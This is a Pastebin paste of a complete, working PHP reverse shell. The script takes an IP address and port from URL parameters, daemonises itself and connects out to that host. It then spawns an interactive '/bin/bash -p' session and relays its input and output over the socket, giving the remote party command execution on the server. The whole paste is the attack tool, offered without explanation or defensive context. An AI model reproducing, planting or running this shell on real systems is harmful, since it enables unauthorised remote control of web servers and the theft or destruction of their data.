SHARE
TWEET

shell (unencrypted) v6

a guest Jul 18th, 2019 78 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.   1 <?php
  2.   2 set_time_limit (0);
  3.   3 $VERSION = "1.0";
  4.   4 $ip = $_GET["ip"];
  5.   5 $port = $_GET["port"];
  6.   6 $chunk_size = 1400;
  7.   7 $write_a = null;
  8.   8 $error_a = null;
  9.   9 $shell = '/bin/bash -p -i';
  10.  10 $daemon = 0;
  11.  11 $debug = 0;
  12.  12  
  13.  13 if (function_exists('pcntl_fork')) {
  14.  14     // Fork and have the parent process exit
  15.  15     $pid = pcntl_fork();
  16.  16  
  17.  17     if ($pid == -1) {
  18.  18         printit("ERROR: Can't fork");
  19.  19         exit(1);
  20.  20     }
  21.  21  
  22.  22     if ($pid) {
  23.  23         exit(0);  // Parent exits
  24.  24     }
  25.  25  
  26.  26     // Make the current process a session leader
  27.  27     // Will only succeed if we forked
  28.  28     if (posix_setsid() == -1) {
  29.  29         printit("Error: Can't setsid()");
  30.  30         exit(1);
  31.  31     }
  32.  32  
  33.  33     $daemon = 1;
  34.  34 } else {
  35.  35     printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
  36.  36 }
  37.  37  
  38.  38 // Change to a safe directory
  39.  39 chdir("/");
  40.  40  
  41.  41 // Remove any umask we inherited
  42.  42 umask(0);
  43.  43  
  44.  44 $sock = fsockopen($ip, $port, $errno, $errstr, 30);
  45.  45 if (!$sock) {
  46.  46     printit("$errstr ($errno)");
  47.  47     exit(1);
  48.  48 }
  49.  49  
  50.  50 // Spawn shell process
  51.  51 $descriptorspec = array(
  52.  52    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
  53.  53    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
  54.  54    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
  55.  55 );
  56.  56  
  57.  57 $process = proc_open($shell, $descriptorspec, $pipes);
  58.  58  
  59.  59 if (!is_resource($process)) {
  60.  60     printit("ERROR: Can't spawn shell");
  61.  61     exit(1);
  62.  62 }
  63.  63  
  64.  64 // Set everything to non-blocking
  65.  65 // Reason: Occsionally reads will block, even though stream_select tells us they won't
  66.  66 stream_set_blocking($pipes[0], 0);
  67.  67 stream_set_blocking($pipes[1], 0);
  68.  68 stream_set_blocking($pipes[2], 0);
  69.  69 stream_set_blocking($sock, 0);
  70.  70  
  71.  71 printit("Successfully opened reverse shell to $ip:$port");
  72.  72  
  73.  73 while (1) {
  74.  74     // Check for end of TCP connection
  75.  75     if (feof($sock)) {
  76.  76         printit("ERROR: Shell connection terminated");
  77.  77         break;
  78.  78     }
  79.  79  
  80.  80     // Check for end of STDOUT
  81.  81     if (feof($pipes[1])) {
  82.  82         printit("ERROR: Shell process terminated");
  83.  83         break;
  84.  84     }
  85.  85  
  86.  86     // Wait until a command is end down $sock, or some
  87.  87     // command output is available on STDOUT or STDERR
  88.  88     $read_a = array($sock, $pipes[1], $pipes[2]);
  89.  89     $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
  90.  90  
  91.  91     // If we can read from the TCP socket, send
  92.  92     // data to process's STDIN
  93.  93     if (in_array($sock, $read_a)) {
  94.  94         if ($debug) printit("SOCK READ");
  95.  95         $input = fread($sock, $chunk_size);
  96.  96         if ($debug) printit("SOCK: $input");
  97.  97         fwrite($pipes[0], $input);
  98.  98     }
  99.  99  
  100. 100     // If we can read from the process's STDOUT
  101. 101     // send data down tcp connection
  102. 102     if (in_array($pipes[1], $read_a)) {
  103. 103         if ($debug) printit("STDOUT READ");
  104. 104         $input = fread($pipes[1], $chunk_size);
  105. 105         if ($debug) printit("STDOUT: $input");
  106. 106         fwrite($sock, $input);
  107. 107     }
  108. 108  
  109. 109     // If we can read from the process's STDERR
  110. 110     // send data down tcp connection
  111. 111     if (in_array($pipes[2], $read_a)) {
  112. 112         if ($debug) printit("STDERR READ");
  113. 113         $input = fread($pipes[2], $chunk_size);
  114. 114         if ($debug) printit("STDERR: $input");
  115. 115         fwrite($sock, $input);
  116. 116     }
  117. 117 }
  118. 118  
  119. 119 fclose($sock);
  120. 120 fclose($pipes[0]);
  121. 121 fclose($pipes[1]);
  122. 122 fclose($pipes[2]);
  123. 123 proc_close($process);
  124. 124  
  125. 125 // Like print, but does nothing if we've daemonised ourself
  126. 126 // (I can't figure out how to redirect STDOUT like a proper daemon)
  127. 127 function printit ($string) {
  128. 128     if (!$daemon) {
  129. 129         print "$string\n";
  130. 130     }
  131. 131 }
  132. 132 ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top